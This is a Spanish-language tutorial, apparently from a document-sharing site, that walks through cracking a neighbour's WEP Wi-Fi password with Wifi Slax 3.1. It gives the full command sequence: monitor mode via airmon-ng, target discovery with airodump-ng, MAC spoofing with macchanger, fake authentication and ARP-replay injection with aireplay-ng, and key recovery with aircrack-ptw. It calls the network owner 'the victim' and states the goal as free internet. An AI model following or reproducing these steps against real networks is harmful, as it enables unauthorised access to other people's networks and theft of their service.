Está en la página 1de 5

PCR

DCG

Nota: Las Comillas que se ponen aquí en el manual solo son para hacer especificaciones, pero
no significan que las vamos a colocar durante el proceso que vayamos a ejecutar.

1 Lo primero que tenemos que hacer es saber que tipo de tarjeta estamos
utilizando y para verificar que Wifi Slax 3.1 reconocer nuestra tarjeta de red.
Abrimos una “Shell” y escribimos el siguiente comando:

iwconfig

Una vez puesto el comando nos debe aparecer unas características en


las siguientes partes:
2 wifi0
ath0
eth0
Si nos aparece alguna característica en wifi0, en ath0 o en eth0 nos
da a entender que nuestra tarjeta de red inalámbrica es compatible con Wifi
Slax 3.1

Tenemos que poder en modo monitor nuestra tarjeta, pero


manualmente escribiendo el siguiente comando en una “Shell”

airmon-ng start ath0

Y listo cerramos esa ventana.


PCR
DCG

3 Ahora para saber la MAC de nuestra victima = BSSID y el canal,


abriremos una ventana de “Modo Monitor”, Y para esto vamos a
“Inicio------> Wifi Slax---> Asistencia de chipset -----> Asistencia de
chipset Atheros -----> Modo monitor” le damos clic; una vez abierta esa
ventana, escribimos el comando:
airodump-ng –w “Poner cualquier nombre” –c 1-11 ath0

Se escanearan redes en los 11 canales que existen; Wifi Slax nos va a detectar
en que canal se encuentra la red que vamos a cracker y a la vez la BSSID
que es lo mismo que la MAC pero de nuestra víctima.

BSSID = MAC DE LA VICTIMA


CH = CHANEL o CANAL DE LA RED DE LA VICTIMA (Importante)

4 Una vez obtenida la BSSID y el CANAL, anotamos eso en una hoja,


paramos el proceso con las teclas CTRL + C y ahora apagamos la interfaz en
esta misma “Shell” con el siguiente comando:

ifconfig ath0 down

5 Procederemos a cambiar la MAC Verdadera que trae


predeterminada nuestra tarjeta de red inalámbrica por una MAC
FALSA y lo hacemos en esta misma “Shell” poniendo el siguiente
comando:

macchanger -m 00:11:22:33:44:55 ath0

Automáticamente la interfaz se encenderá a la hora de cambiar nuestra


MAC.
PCR
DCG
Ahora crearemos un archivo en donde se guardaran los paquetes
6
capturados, abrimos una “Shell” y escribimos el siguiente comando:

airodump-ng –w “Poner un nombre diferente al Modem” –c 1 --bssid


(Seguido de la BSSID o MAC de la victima) ath0

El nombre diferente del modem es necesario anotarlo en una hoja


porque lo utilizaremos en el paso Número 9
por que va a ser el
archivo en donde se almacenaran los paquetes capturados.

7 Para asociarnos a la red utilizaremos el comando “aireplay-ng”, así


que procedemos a abrir una “Shell” y sin cerrar ninguna ventana
anterior nos asociaremos con el siguiente comando:

aireplay-ng -1 0 -e “Nombre del modem o de la red” -a “La BSSID o


MAC DE LA VICTIMA” –h 00:11:22:33:44:55 ath0

Donde:

-1= Tipo de ataque


-e= Es el modificador que indica el nombre del MODEM
-a= de adares y es la MAC de la victima
-h= de hide y es la dirección oculta o MAC FALSA

Nos saldrá una carita Feliz :-) y eso indicara que la asociación a
sido un éxito.
PCR
DCG

Capturaremos paquetes en esta misma “Shell” utilizando el


8 siguiente comando:

aireplay-ng -3 -b “MAC o BSSID de la víctima” –h 00:11:22:33:44:55


ath0

Donde:

-3 = Tipo de ataque de inyección.


-b = BSSID o verdadera MAC de la Victima.
-h = De “hide” que es la MAC FALSA.

“Cuando tengamos aproximadamente 25,000


paquetes recibidos crackearemos la red”

9 Ahora crackearemos la red para encontrar la clave de diez


dígitos y para esto abrimos una “Shell” y sin cerrar ninguna de las
ventanas anteriores escribiremos el siguiente comando:

aircrack-ptw “nombre del archivo que pusimos en paso


Nº 6” seguido de -01.cap
Ejemplo:
aircrack-ptw redvecino-01.cap
PCR
DCG
Nos saldrá un cuadro con el siguiente texto:
Buscando Nueva Tabla
BSSID (Aparecerá la MAC verdadera de nuestra victima =BSSID)
Estadística para BSSID (Aparece otra ves la MAC de la victima)
Keindex=0 Paquete (Muestra los paquetes capturados)
Clave encontrada con longitud 05: (Nos aparecerá una clave de 10
Números o Números con letras y esa es la CLAVE DEL MODEM)
Paramos los procesos que tenemos abiertos con CTRL + C y
cerramos esas ventanas.
Salimos del Wifi Slax 3.1 y reiniciamos la computadora.
Cuando estemos buscando la red crackeada escribimos la
contraseña en donde no las pide y eso es todo INTERNET
GRATIS.

PCR
DCG

También podría gustarte